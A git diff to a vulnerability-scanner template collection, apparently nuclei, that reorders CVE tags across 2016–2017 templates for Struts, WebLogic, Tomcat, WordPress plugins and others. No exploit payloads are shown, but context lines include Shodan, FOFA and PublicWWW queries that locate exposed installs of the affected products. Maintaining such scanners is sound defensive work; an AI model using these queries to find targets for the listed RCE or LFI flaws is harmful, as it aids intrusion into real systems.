a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index c50ecad77e..6d26207114 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: shiro - tags: cve,apache,rce,kev,packetstorm,cve2016,shiro,deserialization,oast + tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast http: - raw: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 0d8034c3b6..8264d2ce35 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: http_server - tags: cve,cve2016,crlf,apache + tags: cve2016,cve,crlf,apache,xss http: - method: GET diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index a1d54ee5da..285320d99d 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: pivotal product: spring_security_oauth - tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring,pivotal + tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal http: - method: GET diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index f7ee34440c..152346145b 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netgear product: dgn2200_firmware - tags: cve,cve2016,iot,netgear,router,packetstorm + tags: cve2016,cve,iot,netgear,router,packetstorm http: - raw: diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 45ac6e5af8..31367e5292 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -30,7 +30,7 @@ info: vendor: vbulletin product: vbulletin shodan-query: title:"Powered By vBulletin" - tags: cve,cve2016,vbulletin,sqli,forum,edb + tags: cve2016,cve,vbulletin,sqli,forum,edb http: - method: GET diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index ba2ec75bcc..2d4a76752a 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: d6220_firmware - tags: cve,cve2016,netgear,rce,iot,kev + tags: cve2016,cve,netgear,rce,iot,kev http: - method: GET diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 34864c7675..ee0df9064a 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zohocorp product: webnms_framework - tags: edb,cve,cve2016,zoho,lfi,webnms,zohocorp + tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp http: - method: GET diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index a0a5ec289d..e790b6d30c 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: trendmicro product: threat_discovery_appliance - tags: msf,cve,cve2016,lfi,auth,bypass,trendmicro + tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro http: - method: GET diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 6b636062db..4f2d22705f 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: sony product: snc_series_firmware - tags: sony,backdoor,unauth,telnet,iot,camera + tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera http: - method: GET diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 3e1c0bef30..82269626c3 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: spip product: spip - tags: cve,cve2016,xss,spip + tags: cve2016,cve,xss,spip http: - method: GET diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index db4256e76a..da68123194 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: hp product: airwave - tags: cve2016,aruba,xss,edb,cve,hp + tags: cve2016,cve,aruba,xss,edb,hp http: - method: GET diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 49bbb457df..e76b958ef9 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: dnnsoftware product: dotnetnuke - tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf,dnnsoftware + tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index c9f6825433..810453e680 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: oracle product: glassfish_server - tags: oracle,glassfish,lfi,edb,cve,cve2017 + tags: cve,cve2017,oracle,glassfish,lfi,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index ee195221b2..b293853a53 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: jqueryfiletree_project product: jqueryfiletree - tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project + tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project http: - method: POST diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 2cf9fa10b4..b3386a6495 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: primetek product: primefaces - tags: cve,cve2017,primetek,rce,injection,kev + tags: cve2017,cve,primetek,rce,injection,kev http: - raw: diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 0f5c302d38..ef6f056226 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: oracle product: weblogic_server - tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle + tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle http: - raw: diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index f975386b4a..fd465597b7 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: yaws product: yaws - tags: edb,cve,cve2017,yaws,lfi + tags: cve,cve2017,edb,yaws,lfi http: - method: GET diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index e0bbec12a0..328047db89 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -29,7 +29,7 @@ info: vendor: datataker product: dt80_dex_firmware shodan-query: http.title:"datataker" - tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure + tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure http: - method: GET diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 0891277a11..6eaa521fa7 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: intelliants product: subrion_cms - tags: cve,cve2017,sqli,subrion,intelliants + tags: cve2017,cve,sqli,subrion,intelliants http: - method: GET diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index f71e5d3ec6..a45de21ddf 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -28,7 +28,7 @@ info: vendor: supervisord product: supervisor shodan-query: http.title:"Supervisor Status" - tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor,supervisord + tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord http: - raw: diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index f18f626b3c..a9011973b0 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: redhat product: jboss_enterprise_application_platform - tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss,intrusive,redhat + tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat http: - raw: diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 8508cc091f..b823b6610c 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: hp product: integrated_lights-out_4_firmware - tags: ilo4,hpe,auth-bypass,edb,cve,cve2017,hp + tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp http: - method: GET diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 398bdf9076..42ad8eb856 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" - tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive + tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive http: - method: PUT diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 9074f5f73d..fbd5db346e 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -30,7 +30,7 @@ info: vendor: apache product: tomcat shodan-query: html:"Apache Tomcat" - tags: cve,cve2017,tomcat,apache,rce,kev,intrusive + tags: cve2017,cve,tomcat,apache,rce,kev,intrusive http: - raw: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index f3d37d4cd4..0f854e5879 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: apache product: solr - tags: oast,xxe,vulhub,cve,cve2017,solr,apache + tags: cve2017,cve,oast,xxe,vulhub,solr,apache http: - raw: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 43623e793f..7ea440f6ec 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: couchdb - tags: cve,cve2017,couchdb,apache,intrusive + tags: cve2017,cve,couchdb,apache,intrusive http: - raw: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index cc69e3f2c3..0b0f910e74 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -27,7 +27,7 @@ info: vendor: sap product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2017,sap,lfi,java,traversal + tags: cve2017,cve,sap,lfi,java,traversal http: - method: GET diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index ab73021ea5..7fa8eec96e 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: djangoproject product: django - tags: xss,django,cve,cve2017,djangoproject + tags: cve2017,cve,xss,django,djangoproject http: - method: GET diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index c70116e62b..5e6bb47f0b 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -27,7 +27,7 @@ info: vendor: dreambox product: opendreambox shodan-query: title:"Dreambox WebControl" - tags: cve2017,dreambox,rce,oast,edb,cve + tags: cve,cve2017,dreambox,rce,oast,edb http: - raw: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 3da75fbe4d..0b71be2d32 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -30,7 +30,7 @@ info: vendor: fortinet product: fortios shodan-query: port:10443 http.favicon.hash:945408572 - tags: cve,cve2017,fortigate,xss,fortinet + tags: cve2017,cve,fortigate,xss,fortinet http: - method: GET diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 7d2a1c2af1..bc7d6a1952 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: opentext product: documentum_administrator - tags: cve,cve2017,redirect,opentext,seclists + tags: cve2017,cve,redirect,opentext,seclists http: - method: GET diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index f057b6a698..70d699a3e9 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -29,7 +29,7 @@ info: vendor: 2kblater product: 2kb_amazon_affiliates_store framework: wordpress - tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater + tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater http: - raw: diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index ab037ec119..605aa31356 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: nodejs product: node.js - tags: cve,cve2017,nodejs,lfi + tags: cve2017,cve,nodejs,lfi http: - method: GET diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index d8bc45f000..9f6840d6f4 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -27,7 +27,7 @@ info: vendor: bouqueteditor_project product: bouqueteditor framework: dreambox - tags: dreambox,edb,cve,cve2017,xss,bouqueteditor_project + tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project http: - raw: diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 6fde3c1850..48c637a293 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: fiberhome product: routerfiberhome_firmware - tags: lfi,router,edb,cve,cve2017,fiberhome + tags: cve,cve2017,lfi,router,edb,fiberhome http: - method: GET diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 1ee0b87025..a4bbce1f07 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: apache product: http_server - tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive + tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive http: - raw: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 54a89b4589..083f59abd2 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: paloaltonetworks product: pan-os - tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect,paloaltonetworks + tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks http: - raw: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index c1573f9479..c709f70d57 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: ulterius product: ulterius_server - tags: cve2017,ulterius,traversal,edb,cve + tags: cve2017,cve,ulterius,traversal,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 7c8c7b0124..088d72d7bd 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -31,7 +31,7 @@ info: product: laravel shodan-query: Laravel-Framework fofa-query: app="Laravel-Framework" - tags: cve2017,laravel,exposure,packetstorm,cve + tags: cve,cve2017,laravel,exposure,packetstorm http: - method: GET diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index bc046d444f..de7ec80a47 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -27,7 +27,7 @@ info: vendor: zitec product: emag_marketplace_connector framework: wordpress - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress,zitec + tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec http: - method: GET diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 4adc2176e9..11c3dd68dc 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -26,7 +26,7 @@ info: vendor: amtythumb_project product: amtythumb framework: wordpress - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress,amtythumb_project + tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project http: - method: POST diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 60f4ad3759..264a9fa1d6 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -29,7 +29,7 @@ info: product: dedecms shodan-query: http.html:"DedeCms" fofa-query: app="DedeCMS" - tags: sqli,dedecms + tags: cve,cve2017,sqli,dedecms variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index a0a8240e5b..c1a58f47ac 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -28,7 +28,7 @@ info: vendor: kentico product: kentico_cms google-query: intitle:"kentico database setup" - tags: cve,cve2017,kentico,cms,install,unauth,edb + tags: cve2017,cve,kentico,cms,install,unauth,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index d980b4e413..a4eb62ddb4 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: avantfax product: avantfax - tags: avantfax,hackerone,packetstorm,cve,cve2017,xss + tags: cve,cve2017,avantfax,hackerone,packetstorm,xss http: - raw: diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index d11eae063b..d20b7a206e 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -26,7 +26,7 @@ info: product: contact_form_to_db framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-to-db/" - tags: cve,cve2017,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 03ef01f738..569681015e 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -26,7 +26,7 @@ info: product: social_buttons_pack framework: wordpress publicwww-query: "/wp-content/plugins/social-buttons-pack/" - tags: cve,cve2017,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 5818a5a229..ada7e354cd 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -26,7 +26,7 @@ info: product: social_login framework: wordpress publicwwww-query: "/wp-content/plugins/social-login-bws/" - tags: cve,cve2017,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index b2ec89a2e9..e03b342129 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -26,7 +26,7 @@ info: product: subscriber framework: wordpress publicwww-query: "/wp-content/plugins/subscriber/" - tags: cve,cve2017,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 1f08cd3920..b2ff9bbfe6 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -27,7 +27,7 @@ info: product: linkedin framework: wordpress publicwww-query: "/wp-content/plugins/bws-linkedin/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 6aedd597c4..2b7b4fe77d 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -26,7 +26,7 @@ info: product: pagination framework: wordpress publicwww-query: "/wp-content/plugins/pagination/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss http: - raw: diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 103e1b5117..ee4214faa9 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -26,7 +26,7 @@ info: product: rating framework: wordpress publicwww-query: "/wp-content/plugins/rating-bws/" - tags: cve,cve2017,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 6228a0c036..c519621063 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -26,7 +26,7 @@ info: vendor: fullworks product: stop_user_enumeration framework: wordpress - tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin,fullworks + tags: cve2017,cve,wpscan,wordpress,xss,wp-plugin,fullworks http: - method: GET diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index f9071584c3..1e31feabd4 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -27,7 +27,7 @@ info: product: google_analytics framework: wordpress publicwww-query: "/wp-content/plugins/bws-google-analytics/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 6dc1b630f6..ec47a8a2b7 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -26,7 +26,7 @@ info: product: testimonials framework: wordpress publicwww-query: "/wp-content/plugins/bws-testimonials/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index f8acbd0b2a..837fd15ae8 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -26,7 +26,7 @@ info: product: updater framework: wordpress publicwww-query: "/wp-content/plugins/updater/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft http: - raw: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 258c5ab66a..55ce465598 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -27,7 +27,7 @@ info: vendor: designmodo product: qards framework: wordpress - tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss,designmodo + tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo http: - method: GET diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index af4e613608..46f1aa9c36 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: oracle product: weblogic_server - tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle + tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle http: - raw: diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 33a6155783..a996addcb7 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: oracle product: applications_framework - tags: oracle,redirect,edb,cve,cve2017 + tags: cve,cve2017,oracle,redirect,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index c96a2cf7c9..2f91fccbf6 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -29,7 +29,7 @@ info: vendor: wordpress product: wordpress shodan-query: http.component:"WordPress" - tags: cve,cve2017,wordpress,wp,edb + tags: cve2017,cve,wordpress,wp,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 37e6657b09..b9b7acbd62 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: kmc_information_systems product: caseaware - tags: edb,cve,cve2017,xss,caseaware,kmc_information_systems + tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems http: - method: GET diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index f89dc4f11d..652d0f369b 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -30,7 +30,7 @@ info: vendor: apache product: struts shodan-query: html:"Apache Struts" - tags: cve,cve2017,apache,kev,msf,struts,rce + tags: cve2017,cve,apache,kev,msf,struts,rce http: - raw: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index c2c9cb07a3..1b9a0a64a3 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -29,7 +29,7 @@ info: vendor: intel product: active_management_technology_firmware shodan-query: title:"Active Management Technology" - tags: cve,cve2017,amt,intel,tenable,kev + tags: cve2017,cve,amt,intel,tenable,kev http: - raw: diff --git a/http/cves/2017/CVE-2017-5982.yaml 